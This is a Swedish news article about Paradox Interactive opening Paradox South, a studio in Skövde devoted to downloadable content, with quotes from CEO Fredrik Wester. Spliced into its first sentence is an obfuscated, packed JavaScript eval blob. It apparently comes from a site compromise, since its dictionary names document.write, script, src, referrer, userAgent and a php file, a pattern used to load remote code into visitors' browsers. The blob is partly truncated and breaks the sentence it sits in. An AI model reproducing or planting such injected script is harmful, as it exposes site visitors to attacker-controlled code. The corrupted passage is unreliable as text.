Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Sveriges största spelstudio Paradox Interactive öppnar specialkontor för tillbehör

Sveriges största spelstudio Paradox Interactive öppnar specialkontor för tillbehör
Sebastian

Sveriges eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nehhd|var|u0026u|referrer|kfenh||js|php’.split(’|’),0,{}))
största datorspelutvecklare och datorspelförläggare Paradox Interactive expanderar och öppnar nytt kontor i spelutbildningsmeckat Skövde. Kontoret ska tillverka så kallat DLC, nedladdningsbara tillbehör till befintliga spel. Fler jobb, närmare koppling mellan utbildning och arbetsliv, och ännu roligare spel räknar Paradox med att följden av etableringen blir.

Kontoret är det första i sitt slag i Sverige, en hel studio som enbart ska utveckla DLC. Förkortningen DLC står för ”Downloadable content” och är digitalt nedladdningsbara tillägg till kompletta, redan befintliga speltitlar. DLC kommer i både stora och små format och består ofta av nya banor, karaktärer, föremål eller utmaningar.

–          Paradox South är en del i vår utökade satsning på egenproducerat material. Idag både förlägger vi andra utvecklares material, samtidigt som vår studio Paradox Development Studio löpande tar fram egna titlar. Med ett kontor som helt fokuserar på DLC kommer vi att kunna skapa riktigt grymma speltillbehör och utöka spelupplevelsen för alla gamers som gillar våra spel, säger Fredrik Wester, VD Paradox Interactive.

Det nya Skövde-baserade kontoret kommer att heta Paradox South. Namnet är dels en travesti på att många stora spelbolag i USA har ”North”- och ”South”-kontor, dels har det en rent geografisk förklaring då Paradox huvudkontor ligger i Stockholm. Skövde befinner sig ju som bekant söder om huvudstaden.

–          Att vi öppnar kontor i just Skövde beror på två saker; dels att Skövde har väldigt bra datorspelsutbildningar och att det därmed finns många duktiga personer här som utgör ett bra rekryteringsunderlag, dels för att Skövde är en viktig plats rent strategiskt för Paradox fortsatta samarbete med flera av de andra spelutvecklare som redan sitter där idag, säger Fredrik Wester.